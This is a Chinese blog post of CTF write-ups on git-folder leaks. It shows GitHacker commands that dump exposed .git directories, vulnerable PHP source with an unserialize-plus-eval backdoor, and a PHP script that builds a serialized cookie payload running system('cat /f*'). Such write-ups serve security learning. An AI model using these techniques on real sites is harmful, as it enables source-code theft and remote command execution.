<!DOCTYPE html><html lang="zh-CN"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><meta name="author" content="userq"><meta name="renderer" content="webkit"><meta name="copyright" content="userq"><meta name="keywords" content="MyBlog"><meta name="description" content="MyBlog"><meta name="Cache-Control" content="no-cache"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>git泄露 · Mr.cheng's Blog</title><link rel="stylesheet" href="/css/style.css?v=2018.7.9"><link rel="stylesheet" href="/css/animation.css?v=2018.7.9"><link rel="icon" href="/img/assets/favicon.ico"><link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css?version=1.5.6"><!-- scripts--><script>(function( w ){
  "use strict";
  // rel=preload support test
  if( !w.loadCSS ){
    w.loadCSS = function(){};
  }
  // define on the loadCSS obj
  var rp = loadCSS.relpreload = {};
  // rel=preload feature support test
  // runs once and returns a function for compat purposes
  rp.support = (function(){
    var ret;
    try {
      ret = w.document.createElement( "link" ).relList.supports( "preload" );
    } catch (e) {
      ret = false;
    }
    return function(){
      return ret;
    };
  })();

  // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
  // then change that media back to its intended value on load
  rp.bindMediaToggle = function( link ){
    // remember existing media attr for ultimate state, or default to 'all'
    var finalMedia = link.media || "all";

    function enableStylesheet(){
      link.media = finalMedia;
    }

    // bind load handlers to enable media
    if( link.addEventListener ){
      link.addEventListener( "load", enableStylesheet );
    } else if( link.attachEvent ){
      link.attachEvent( "onload", enableStylesheet );
    }

    // Set rel and non-applicable media type to start an async request
    // note: timeout allows this to happen async to let rendering continue in IE
    setTimeout(function(){
      link.rel = "stylesheet";
      link.media = "only x";
    });
    // also enable media after 3 seconds,
    // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
    setTimeout( enableStylesheet, 3000 );
  };

  // loop through link elements in DOM
  rp.poly = function(){
    // double check this to prevent external calls from running
    if( rp.support() ){
      return;
    }
    var links = w.document.getElementsByTagName( "link" );
    for( var i = 0; i < links.length; i++ ){
      var link = links[ i ];
      // qualify links to those with rel=preload and as=style attrs
      if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
        // prevent rerunning on link
        link.setAttribute( "data-loadcss", true );
        // bind listeners to toggle media back
        rp.bindMediaToggle( link );
      }
    }
  };

  // if unsupported, run the polyfill
  if( !rp.support() ){
    // run once at least
    rp.poly();

    // rerun poly on an interval until onload
    var run = w.setInterval( rp.poly, 500 );
    if( w.addEventListener ){
      w.addEventListener( "load", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    } else if( w.attachEvent ){
      w.attachEvent( "onload", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    }
  }


  // commonjs
  if( typeof exports !== "undefined" ){
    exports.loadCSS = loadCSS;
  }
  else {
    w.loadCSS = loadCSS;
  }
}( typeof global !== "undefined" ? global : this ) );</script><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" defer></script><script src="/js/main.js?v=2018.7.9" defer></script><!-- fancybox--><link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script><!-- busuanzi--><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><meta name="generator" content="Hexo 7.3.0"><link rel="alternate" href="/atom.xml" title="MyBlog" type="application/atom+xml">
</head><body><section class="profile-close" id="cxo-profile"><div class="profile-avatar"><i class="fa fa-caret-left"></i><img src="/img/assets/cat.png"></div><!--.profile-saying
  i.fa.fa-comment
  .saying--><div class="cxo-profile-inner"><div class="profile-name">userq</div><div class="profile-signature">for me</div><div class="friends"><div>FRIENDS</div><span><a href="//1768161086.github.io/" target="_black">friendA</a></span><span><a href="//github.com/" target="_black">friendB</a></span><span><a href="//github.com/" target="_black">friendC</a></span></div><div class="read-progress"></div></div></section><header id="cxo-intro" style="height: 70vh;background-image: url(/img/intro/index-bg.png);"><nav id="cxo-intro-nav"><section><div class="intro-nav-title"><a href="/">Mr.cheng's Blog</a></div><div class="intro-nav-label-box"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div><i class="fa fa-bars intro-nav-menu"><div class="intro-nav-drop"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div></i><div class="clear"></div></section></nav><h1 class="post-title">git泄露</h1><div class="post-intros"><div class="post-intro-meta"><span class="post-intro-time"><i class="post-intro-calendar fa fa-calendar"></i><span>2025-03-12</span></span></div></div></header><article class="cxo-up" id="cxo-content-outer"><section id="cxo-content-inner"><article class="article-entry" id="post"><blockquote>
<h2 id="Back-to-the-Future"><a href="#Back-to-the-Future" class="headerlink" title="Back to the Future"></a>Back to the Future</h2></blockquote>
<p>本题考查了 Git 泄露和 git 的一些基本操作</p>
<p>1.我们打开后可以看到什么都没有, 我们可以考虑进行目录扫描或者直接看 <code>robots.txt</code></p>
<p>可以看到存在 <code>.git</code> 文件夹, 我们可以通过 <code>GitHacker</code> 来获取 <code>.git</code> 的全部内容</p>
<p>2.克隆GitHacker</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git clone https://github.com/WangYihang/GitHacker</span><br></pre></td></tr></table></figure>

<p>3.下载GitHacker</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -m pip install -i https://pypi.org/simple/ GitHacker</span><br></pre></td></tr></table></figure>

<p>（一定要在含有【<strong>requirements.txt</strong>】这个文件的目录下载）：</p>
<p>4.执行命令</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">githacker --url http://challenge.basectf.fun:35137/ --output back-future</span><br></pre></td></tr></table></figure>

<p>随后会生成一个文件夹，名字就是由此命令的最后一个参数设置的，存放在我们执行此命令的路径</p>
<p>5.下一步需要进入到这个文件夹的<strong>一个子文件夹</strong>，可以用cd命令进行切换，也可以鼠标双击打开此文件夹-&gt;右键-&gt;在此打开终端</p>
<p>6.输入【<strong>git log</strong>】命令，看到这个”add flag”的版本</p>
<p>7.找到含有flag信息的版本后</p>
<p>使用命令【<strong>git diff或者checkout + 版本commit</strong>】查看信息改动，获得flag</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git diff 9d85f10e0192ef630e10d7f876a117db41c30417</span><br></pre></td></tr></table></figure>

<h2 id="Polar2024冬季-ezezser"><a href="#Polar2024冬季-ezezser" class="headerlink" title="Polar2024冬季_ezezser"></a>Polar2024冬季_ezezser</h2><p>1.dirsearch扫描到git泄露</p>
<p>2.使用kali命令下载源码到本地：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">githacker --url http://8f1b9150-1881-4943-92f8-4196742fec0e.www.polarctf.com:8090/.git/ --output 123</span><br></pre></td></tr></table></figure>

<p>3.然后查看git的详细记录</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git show</span><br></pre></td></tr></table></figure>

<p>找到一些不同的内容，完整源码如下</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">error_reporting(0);</span><br><span class="line">highlight_file(__FILE__);</span><br><span class="line"></span><br><span class="line">$polarday=$_GET[&#x27;polarday&#x27;];</span><br><span class="line">$polarnight=$_GET[&#x27;polarnight&#x27;];</span><br><span class="line"></span><br><span class="line">if(isset($polarday) &amp;&amp; isset($polarnight))&#123;</span><br><span class="line">    $polar520 = unserialize($_COOKIE[&#x27;polar520&#x27;]);</span><br><span class="line">    $polar520&gt;login($polarday,$polarnight);</span><br><span class="line">&#125;</span><br><span class="line">class backDoor&#123;</span><br><span class="line">    private $key;</span><br><span class="line">    public function getInfo()&#123;</span><br><span class="line">        eval($this&gt;key);</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class info&#123;</span><br><span class="line">        private $polar520=&#x27;nukaka&#x27;;</span><br><span class="line">        public function getInfo()&#123;</span><br><span class="line">            return $this&gt;polar520;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    class polar520&#123;</span><br><span class="line">        private $polarday=&#x27;nukaka&#x27;;</span><br><span class="line">        private $polarnight=&#x27;nukaka&#x27;;</span><br><span class="line">        private $polar=false;</span><br><span class="line">        private $class = &#x27;info&#x27;;</span><br><span class="line"></span><br><span class="line">        public function __construct()&#123;</span><br><span class="line">            $this&gt;class=new info();</span><br><span class="line">        &#125;</span><br><span class="line">        public function login($a,$b)&#123;</span><br><span class="line">            return $this&gt;polarday===$a&amp;&amp;$this&gt;polarnight===$b;</span><br><span class="line">        &#125;</span><br><span class="line">        public function __destruct()&#123;</span><br><span class="line">            $this&gt;class&gt;getInfo();</span><br><span class="line">        &#125;</span><br><span class="line">    &#125;</span><br></pre></td></tr></table></figure>

<p>4.构造php 反序列化链:<br>从destruct触发然后调用backDoor类的后门函数，需要url编码传进cookie</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">if (isset($polarday) &amp;&amp; isset($polarnight)) &#123;</span><br><span class="line">    $polar520 = unserialize($_COOKIE[&#x27;polar520&#x27;]);</span><br><span class="line">    $polar520-&gt;login($polarday, $polarnight);</span><br><span class="line">&#125;</span><br><span class="line">class backDoor</span><br><span class="line">&#123;</span><br><span class="line">    private $key;</span><br><span class="line">    public function getInfo()</span><br><span class="line">    &#123;</span><br><span class="line">        eval($this-&gt;key);</span><br><span class="line">    &#125;</span><br><span class="line">    public function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;key = &quot;system(&#x27;cat /f*&#x27;);&quot;;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">class info</span><br><span class="line">&#123;</span><br><span class="line">    private $polar520 = &#x27;nukaka&#x27;;</span><br><span class="line">    public function getInfo()</span><br><span class="line">    &#123;</span><br><span class="line">        return $this-&gt;polar520;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class polar520</span><br><span class="line">&#123;</span><br><span class="line">    private $polarday = &#x27;nukaka&#x27;;</span><br><span class="line">    private $polarnight = &#x27;nukaka&#x27;;</span><br><span class="line">    private $polar = false;</span><br><span class="line">    private $class;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">    public function login($a, $b)</span><br><span class="line">    &#123;</span><br><span class="line">        return $this-&gt;polarday === $a &amp;&amp; $this-&gt;polarnight === $b;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    public function __construct()</span><br><span class="line">    &#123;</span><br><span class="line">        $this-&gt;class = new backDoor();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br><span class="line">$a = new polar520();</span><br><span class="line">echo urlencode(serialize($a));</span><br></pre></td></tr></table></figure>

<p>5.get传入polarday和polarnight为1</p>
</article><!-- lincense--><div class="license-wrapper"><p> <span>Author:  </span><a href="http://1768161086.github,io">userq</a></p><p> <span>Link:  </span><a href="http://1768161086.github,io/2025/03/12/git%E6%B3%84%E9%9C%B2/">http://1768161086.github,io/2025/03/12/git%E6%B3%84%E9%9C%B2/</a></p><p> <span>Copyright:  </span><span>All articles in this blog are licensed under <a rel="license noopener" target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/3.0">CC BY-NC-SA 3.0</a> unless stating additionally.</span></p></div><div class="post-paginator"><a class="prevSlogan" href="/2025/03/12/md5%E8%BF%9B%E9%98%B6/" title="md5进阶"><span>< PreviousPost</span><br><span class="prevTitle">md5进阶</span></a><a class="nextSlogan" href="/2025/03/10/XXE/" title="XXE"><span>NextPost ></span><br><span class="nextTitle">XXE</span></a><div class="clear"></div></div><div id="comment"></div></section></article><footer id="cxo-footer-outer"><div id="cxo-footer-inner"><p class="footer-container"><span>Site by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> | theme </span><a target="_blank" rel="noopener" href="https://github.com/Longlongyu/hexo-theme-Cxo"><span>Cxo</span></a></p><i class="fa fa-user"> </i><span id="busuanzi_value_site_uv"></span><span> | </span><i class="fa fa-eye"> </i><span id="busuanzi_value_site_pv"></span></div></footer><!-- catelog--><div class="toc-wrapper" style="top: 70vh;"><div class="toc-catalog"><i class="fa fa-list"> </i><span>CATALOG</span></div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Back-to-the-Future"><span class="toc-number">1.</span> <span class="toc-text">Back to the Future</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Polar2024%E5%86%AC%E5%AD%A3-ezezser"><span class="toc-number">2.</span> <span class="toc-text">Polar2024冬季_ezezser</span></a></li></ol></div><!-- top--><i class="fa fa-arrow-up close" id="go-up" aria-hidden="true"></i></body></html>